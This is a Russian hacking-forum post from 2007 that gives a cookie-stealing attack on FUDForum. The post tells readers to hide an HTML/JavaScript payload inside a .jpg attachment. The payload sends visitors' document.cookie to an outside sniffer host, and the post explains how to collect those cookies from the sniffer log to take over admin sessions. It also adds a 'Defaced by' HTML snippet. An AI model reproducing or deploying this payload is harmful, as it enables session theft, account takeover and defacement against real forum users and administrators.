Уязвимость FUDForum, Ворование куков FUDForum

Уязвимость FUDForum, Ворование куков FUDForum

29.01.2007, 21:20

HiMiC

Новичок

Регистрация: 22.12.2006

Сообщений: 17

С нами: 10202099

Репутация: 28

Уязвимость FUDForum, Ворование куков FUDForum

Вобщем делается так:
Берём картинку, с названием 1.jpg
Открываем блокнотом. И вставляем в картинку допустим

Код HTML:

<html> 
<head> 
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> 
</head> 
</html>

После вставки в сообщение будет ссылка наподобии этой:
http://forum.site.ru/index.php?t=get...2723&private=0
или так нагляднее:
http://forum.site.ru/index.php?t=getfile&id=2723
После открытия этой ссылки произойдёт кража куков пользователей
На проверку кода PHP ещё не проверял, но возможно.
******
Далее идем сюда:
http://old.antichat.ru/sniff/log.php
И вставляем куки себе. И ты админ.

Можно поприкалываться и так:

Код HTML:

<html> 
<head> 
<h1>Defaced by HiMiC</h1> 
</head> 
</html>

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось HiMiC; 29.01.2007 в 21:22..

Похожие темы

Тема

Автор

Раздел

Ответов

Последнее сообщение

Подборка уязвимостей phpBB

-=ka$at1k=-

Уязвимости CMS / форумов

02.07.2006 15:26

Уязвимость в vBulletin. Или abbsessionhash вместо полных куков

Smart12

Уязвимости CMS / форумов

23.02.2006 12:52

Есть ли уязвимость в форумах созданных на http://www.1bb.ru/ ?

bike

Уязвимости CMS / форумов

24.12.2005 17:28

Подмен КУКОВ Ipb2.0.4

Tem

Уязвимости CMS / форумов

13.11.2005 13:26

Уязвимость в iChat'е.

-SX-

Болталка

15.01.2005 23:46